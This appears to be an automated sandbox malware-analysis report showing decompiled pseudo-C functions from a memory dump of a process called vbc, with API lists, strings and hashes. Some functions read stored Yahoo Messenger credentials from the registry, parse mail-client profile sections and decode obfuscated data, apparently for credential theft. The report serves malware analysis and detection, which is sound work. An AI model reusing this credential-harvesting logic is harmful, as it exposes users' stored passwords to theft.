					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BC49( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BC6D(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BD0B(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BC49( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BC6D(_t27, _t127,  &_v1172);
						E0040BD0B(_t121, _t127,  &_v24);
						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053D6(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}































                                                                                                                                                    0x00411366
                                                                                                                                                    0x00411372
                                                                                                                                                    0x00411381
                                                                                                                                                    0x00411387
                                                                                                                                                    0x0041139a
                                                                                                                                                    0x004113a0
                                                                                                                                                    0x004113ae
                                                                                                                                                    0x004113b4
                                                                                                                                                    0x004113cd
                                                                                                                                                    0x004113da
                                                                                                                                                    0x004113dc
                                                                                                                                                    0x004113e2
                                                                                                                                                    0x004113e4
                                                                                                                                                    0x004113f5
                                                                                                                                                    0x0041140b
                                                                                                                                                    0x00411413
                                                                                                                                                    0x0041141f
                                                                                                                                                    0x00411425
                                                                                                                                                    0x00411431
                                                                                                                                                    0x00411434
                                                                                                                                                    0x00411439
                                                                                                                                                    0x0041144b
                                                                                                                                                    0x00411452
                                                                                                                                                    0x0041145e
                                                                                                                                                    0x00411463
                                                                                                                                                    0x0041146c
                                                                                                                                                    0x00411488
                                                                                                                                                    0x0041148d
                                                                                                                                                    0x0041149a
                                                                                                                                                    0x0041149f
                                                                                                                                                    0x004114a5
                                                                                                                                                    0x004114aa
                                                                                                                                                    0x004114ac
                                                                                                                                                    0x004114af
                                                                                                                                                    0x004114ba
                                                                                                                                                    0x004114ba
                                                                                                                                                    0x004114bd
                                                                                                                                                    0x004114c5
                                                                                                                                                    0x004114c8
                                                                                                                                                    0x004114cb
                                                                                                                                                    0x004114ce
                                                                                                                                                    0x004114d8
                                                                                                                                                    0x004114dd
                                                                                                                                                    0x004114e1
                                                                                                                                                    0x004114e4
                                                                                                                                                    0x004114e4
                                                                                                                                                    0x004114e7
                                                                                                                                                    0x004114e7
                                                                                                                                                    0x004114ea
                                                                                                                                                    0x004114ea
                                                                                                                                                    0x004114ed
                                                                                                                                                    0x004114f4
                                                                                                                                                    0x004114f9
                                                                                                                                                    0x004114fb
                                                                                                                                                    0x004114fb
                                                                                                                                                    0x004114fb
                                                                                                                                                    0x00411500
                                                                                                                                                    0x00411502
                                                                                                                                                    0x0041150b
                                                                                                                                                    0x0041150d
                                                                                                                                                    0x0041150f
                                                                                                                                                    0x00411512
                                                                                                                                                    0x00411514
                                                                                                                                                    0x00411515
                                                                                                                                                    0x00411515
                                                                                                                                                    0x0041150f
                                                                                                                                                    0x0041151b
                                                                                                                                                    0x00411524
                                                                                                                                                    0x00411526
                                                                                                                                                    0x00411526
                                                                                                                                                    0x004113e4
                                                                                                                                                    0x0041152e

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00411387
                                                                                                                                                    • memset.MSVCRT ref: 004113A0
                                                                                                                                                    • memset.MSVCRT ref: 004113B4
                                                                                                                                                      • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                                                                                    • strlen.MSVCRT ref: 004113D0
                                                                                                                                                    • memcpy.MSVCRT ref: 004113F5
                                                                                                                                                    • memcpy.MSVCRT ref: 0041140B
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                                                                      • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                                                                                    • memcpy.MSVCRT ref: 0041144B
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                    • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                                                                                    • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                                                                                    • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                                                                                    • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004078FF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                                    			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                                                                                                                    0x004078ff
                                                                                                                                                    0x00407906
                                                                                                                                                    0x00407908
                                                                                                                                                    0x00407908
                                                                                                                                                    0x0040790d
                                                                                                                                                    0x00407914
                                                                                                                                                    0x00407919
                                                                                                                                                    0x0040792b
                                                                                                                                                    0x0040792b
                                                                                                                                                    0x0040791b
                                                                                                                                                    0x0040791b
                                                                                                                                                    0x00407926
                                                                                                                                                    0x00407929
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407929
                                                                                                                                                    0x0040795f
                                                                                                                                                    0x0040795f
                                                                                                                                                    0x0040792d
                                                                                                                                                    0x0040792f
                                                                                                                                                    0x00407a50
                                                                                                                                                    0x00407a50
                                                                                                                                                    0x00407935
                                                                                                                                                    0x0040793b
                                                                                                                                                    0x0040796e
                                                                                                                                                    0x004079ba
                                                                                                                                                    0x004079bb
                                                                                                                                                    0x004079c1
                                                                                                                                                    0x004079c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407970
                                                                                                                                                    0x0040797a
                                                                                                                                                    0x00407986
                                                                                                                                                    0x0040798b
                                                                                                                                                    0x00407990
                                                                                                                                                    0x004079a4
                                                                                                                                                    0x004079aa
                                                                                                                                                    0x004079ab
                                                                                                                                                    0x004079b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407992
                                                                                                                                                    0x0040799d
                                                                                                                                                    0x004079a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004079a2
                                                                                                                                                    0x00407990
                                                                                                                                                    0x0040793d
                                                                                                                                                    0x00407943
                                                                                                                                                    0x00407944
                                                                                                                                                    0x0040794d
                                                                                                                                                    0x0040794e
                                                                                                                                                    0x0040794e
                                                                                                                                                    0x004079c8
                                                                                                                                                    0x004079ce
                                                                                                                                                    0x004079d0
                                                                                                                                                    0x004079d0
                                                                                                                                                    0x004079d2
                                                                                                                                                    0x00407a49
                                                                                                                                                    0x00407a49
                                                                                                                                                    0x004079d4
                                                                                                                                                    0x004079d4
                                                                                                                                                    0x004079e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004079f3
                                                                                                                                                    0x004079f9
                                                                                                                                                    0x004079fc
                                                                                                                                                    0x00407a07
                                                                                                                                                    0x00407a1d
                                                                                                                                                    0x00407a2b
                                                                                                                                                    0x00407a36
                                                                                                                                                    0x00407a42
                                                                                                                                                    0x00407a47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407a47
                                                                                                                                                    0x004079e3
                                                                                                                                                    0x004079d2
                                                                                                                                                    0x00407a54

                                                                                                                                                    APIs
                                                                                                                                                    • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                                                                                                    • strlen.MSVCRT ref: 00407998
                                                                                                                                                    • LoadStringA.USER32 ref: 004079C8
                                                                                                                                                    • memcpy.MSVCRT ref: 00407A07
                                                                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                                                                                                      • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                                                                                    • String ID: strings
                                                                                                                                                    • API String ID: 1748916193-3030018805
                                                                                                                                                    • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                                                                                    • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                                                                                                    • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                                                                                    • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040329E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                                                                                                                    0x0040329e
                                                                                                                                                    0x004032ac
                                                                                                                                                    0x004032b6
                                                                                                                                                    0x004032bd
                                                                                                                                                    0x004032c3
                                                                                                                                                    0x004032d3
                                                                                                                                                    0x004032da
                                                                                                                                                    0x004032da
                                                                                                                                                    0x004032ec
                                                                                                                                                    0x004032f2
                                                                                                                                                    0x0040330c
                                                                                                                                                    0x00403314
                                                                                                                                                    0x00403390
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403316
                                                                                                                                                    0x00403316
                                                                                                                                                    0x00403319
                                                                                                                                                    0x0040331c
                                                                                                                                                    0x0040331f
                                                                                                                                                    0x00403322
                                                                                                                                                    0x00403324
                                                                                                                                                    0x00403382
                                                                                                                                                    0x00403383
                                                                                                                                                    0x0040338a
                                                                                                                                                    0x0040338e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040332c
                                                                                                                                                    0x00403332
                                                                                                                                                    0x0040334a
                                                                                                                                                    0x00403367
                                                                                                                                                    0x00403367
                                                                                                                                                    0x0040336c
                                                                                                                                                    0x0040336f
                                                                                                                                                    0x00403379
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040337b
                                                                                                                                                    0x0040337b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040337b
                                                                                                                                                    0x00403379
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403382
                                                                                                                                                    0x00403314
                                                                                                                                                    0x00403394

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                                                                                                    • memset.MSVCRT ref: 004032F2
                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                                                                                                                    • strchr.MSVCRT ref: 00403341
                                                                                                                                                      • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                                                                                                    • strlen.MSVCRT ref: 00403383
                                                                                                                                                      • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                    • String ID: Personalities
                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                    • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                                                                                    • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                                                                                                    • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                                                                                    • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410F79 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}









                                                                                                                                                    0x00410f79
                                                                                                                                                    0x00410f8a
                                                                                                                                                    0x00410f94
                                                                                                                                                    0x00410f9b
                                                                                                                                                    0x00410fb8
                                                                                                                                                    0x00410fd1
                                                                                                                                                    0x00411002
                                                                                                                                                    0x00411002
                                                                                                                                                    0x00411007
                                                                                                                                                    0x00411007
                                                                                                                                                    0x00411012

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00410F9B
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                    • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                                                                                    • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                                                                                                                    • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                                                                                    • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405F41 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405F41(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E46(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                                                                                                                                    0x00405f4b
                                                                                                                                                    0x00405f4f
                                                                                                                                                    0x00405f57
                                                                                                                                                    0x00405f57
                                                                                                                                                    0x00405f60
                                                                                                                                                    0x00405f79
                                                                                                                                                    0x00405f9a

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                                                                    • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                                                                                    • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                                                                                                                    • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                                                                                    • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F037 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                                                                                    0x0040f03e
                                                                                                                                                    0x0040f046
                                                                                                                                                    0x0040f04e
                                                                                                                                                    0x0040f056
                                                                                                                                                    0x0040f063
                                                                                                                                                    0x0040f063
                                                                                                                                                    0x0040f066
                                                                                                                                                    0x0040f070

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,74EB48C0,00405C41,00000000), ref: 0040F040
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                    • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                                                                                    • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                                                                                                    • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                                                                                    • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407406 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                                                                                                                    0x00407412
                                                                                                                                                    0x00407415
                                                                                                                                                    0x0040741a
                                                                                                                                                    0x0040741c
                                                                                                                                                    0x00407422
                                                                                                                                                    0x00407428
                                                                                                                                                    0x00407428
                                                                                                                                                    0x00407428
                                                                                                                                                    0x00407429
                                                                                                                                                    0x0040754a
